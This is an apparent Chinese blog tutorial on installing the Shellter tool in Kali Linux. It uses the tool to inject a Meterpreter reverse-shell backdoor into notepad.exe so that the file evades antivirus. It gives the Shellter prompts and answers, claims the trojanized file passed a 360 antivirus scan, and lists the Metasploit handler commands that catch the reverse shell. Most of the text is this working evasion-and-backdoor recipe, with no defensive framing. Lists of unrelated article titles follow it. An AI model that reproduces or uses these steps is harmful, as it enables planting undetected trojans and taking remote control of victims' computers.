kali 免杀工具shellter安装以及使用
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀
官网:https://www.shellterproject.com/ 目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在linux上运行的话
就需要安装wine环境来运行。我使用的Kali Linux 版本是kali-linux-2020.2目前最新版本 注意的是shellter目前只能注入32位的可执行文件
开始安装:
1. apt-get update //更新一下
2. apt-get install shellter //直接apt在线安装
安装完成后 ,终端直接输入shellter打开会报错,根据提示 我们直接执行命令 dpkg --add-architecture i386 && apt-get update && apt-get install wine32
确认安装即可
现在我们打开shellter就可以打开运行了,工具安装完成后再/usr/share/windows-resources/shellter 这个文件夹
shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下。
免杀实验:
Choose Operation Mode - Auto/Manual (A/M/H):A //选择模式 A 自动模式自动注入后门,M高级模式,H帮助
PE Target:/home/notepad.exe // 注入的程序 这里已windows系统自带的32位记事本程序举例
Enable Stealth Mode? (Y/N/H): Y //是否启用隐身模式 输入Y启用
Use a listed payload or custom? (L/C/H): L //使用攻击模块列表或者自定义? 输入L 选择Payload
Select payload by index: 1 //选择第一个
SET LHOST: 192.168.37.137 //设置反弹回来的IP 本机
SET LPORT:4444 //设置接收反弹的端口
这样我们的木马后门shellcode就注入到这个文件里去了,
开启360全部查杀引擎,更新病毒库,查杀一下试试效果,没有任何提示。
打开msf,进行配置,
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.37.137
set lport 4444
exploit //监听
这时运行带有后门的notepad.exe文件后,控制端成功连接上来,接下来就可以随意操作了。
最新文章
- iconfont的蜕化操作
- Cmake的交叉编译
- Ruby学习心得之 Linux下搭建Ruby环境
- Runas命令:能让域用户/普通User用户以管理员身份运行指定程序。
- 暴力枚举-数长方形(hdu5258)
- 1.6.1 什么是 Indexing
- hhgis驱动
- OpenCV(2)-Mat数据结构及访问Mat中像素
- JQuery操作select checkbox radio总结
- HDU1002——大整数加法
- 编写通用shell脚本启动java项目,适用于多数服务,只需修改服务名即可
- 用CSS让DIV上下左右居中的方法
- javascript知识详解之8张思维导图
- web安全Wargame—Natas解题思路(1-26)
- Socket编程,SocketServer模块
- Android Layout属性笔记
- dll通用操作单元
- C# 反射的深入了解
- Yandex插件使用说明——Slager_Z
- PowerDesigner中NAME和COMMENT的互相转换
热门文章
- Jquery Validate自定义验证规则,一个汉字等于两个字符长度
- tf-gpu报错:ImportError: libcublas.so.10.0: cannot open shared object file: No such file or directory
- kali中设置共享文件夹
- asp.net 读取 connectionStrings
- 泛型(8)-Java7的";菱形";语法与泛型构造器
- ajax和springmvc的请求响应原理——深入理解jQuery中$.get、$.post、$.getJSON和$.ajax的用法
- Jupyter notebook总是卡在int[*]怎么解决?
- 第十五篇 -- QListWidget与QToolButton(界面)
- 前端构建第1篇之---引入elementUI
- 关于ClassLoader 和Class的俩个记录